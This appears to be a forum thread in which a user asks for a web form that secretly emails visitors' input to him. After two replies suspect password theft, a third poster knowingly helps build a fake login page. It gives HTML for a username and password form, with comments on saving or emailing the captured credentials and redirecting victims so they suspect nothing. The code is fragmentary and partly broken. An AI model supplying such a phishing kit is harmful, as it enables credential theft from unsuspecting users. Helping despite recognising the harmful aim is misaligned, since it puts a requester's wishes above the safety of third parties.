Need a code...

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||uLtiMaTE WinNER||
Hey frens,
Can I get the code that generates the form in which when the user clicks the submit button than that form with the input entered by the user is automatically mailed to me … without letting the user to know that those entries are mailed to me or any one.

Choto Cheeta

ohh !! the technology is called contact us form... try searching the forum.. as there are few..

here is one...

Help with Code

now u have to modify the codes according to ur needs...

but what u want doesnt seems good to me :p stealing information is not a good idea... :(


Super Hero - Super Powers
As I think, he wants to steal someone's password or such thing like that.
It's a bad work. Isn't it?


I know u want to use this for creating a fake login page but still i m going to help. I knw this is not right place for such things, leave it yaar U below is just a sample code for u in php
index.php or any login page
<form action="getdata.php" method="post" autocomplete="OFF">
username:<input type="text" name="username" size=50><br>
password:<input type="password" name="pass" size=50 maxlength=30>

// now use these data as u want u want to use them. Store this data
// either in text file or u can send them imediately to ur email but that
// will be risky or u can store this data in database
// for file use fopen(filename,fileaccessmethod)
// for email use mail function i dont know the actuall prototype but u can
// get it from net
// or use mysql_query("INSERT INTO TABLENAME values $usrname, $pass");

//move to actuall page so user think that this page was not a fake page
//a ignore this as a error
header("location: *");
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